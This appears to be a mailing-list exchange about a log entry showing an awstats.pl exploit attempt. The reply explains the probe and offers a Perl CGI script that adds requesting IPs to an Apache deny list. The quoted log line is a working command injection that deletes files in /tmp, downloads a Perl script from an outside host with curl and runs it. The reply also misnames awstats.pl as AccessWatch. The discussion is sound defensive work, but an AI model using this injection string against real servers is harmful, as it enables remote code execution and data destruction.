On Oct 21, Konstantine (nospam-listclient@gmail.com.ns) typed:
Konstantine: My apache logs show rows after rows of following, all from
Konstantine: various IP addresses. This started a couple of days ago. I
Konstantine: don't have awstats. Could somebody tell me what is that? Is
Konstantine: there anything I should be doing? thanks.K.
Konstantine:
Konstantine: GET
//awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/kidk1d/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo|
HTTP/1.1
awstats.pl, I believe, is the AccessWatch log statistics program used to
provide stat details for webservers.
However, that particular entry was try to find an exploit, but since you
dont have it, the web server should have returned a 404. No harm.
You can ignore those, unless you see the server suddenly return a 200
instead of the 404.
Or, you could do what I did:
Write your own PERL script to caputre the offending IP, write it
out to an external blacklist (that Apache includes in it's httpd.conf);
restart Apache and viola! IP banned.
==================================================================
#!/usr/bin/perl -T -w
use warnings;
use strict;
my $IP;
$ENV{PATH}="/usr/bin";
printf("Content-Type: text/html\n\n");
$IP=$ENV{"REMOTE_ADDR"};
open(OUTPUT, ">>/usr/local/apache/nobody/banned") or die;
printf(OUTPUT "\t# %s\n", $0);
printf(OUTPUT "\tDeny from %s\n", $IP);
close(OUTPUT);
system("/usr/bin/touch /usr/local/apache/nobody/restart");
==================================================================
If you view this URL, your IP blacklisted within 2 seconds:
http://concept.temple.edu/cgi-bin/awstats.pl
Comments/Criticism required. :)
Thanks
Scott Birl http://concept.temple.edu/sysadmin/
Senior Systems Administrator Computer Services Temple University
====*====*====*====*====*====*====*====+====*====*====*====*====*====*====*====*
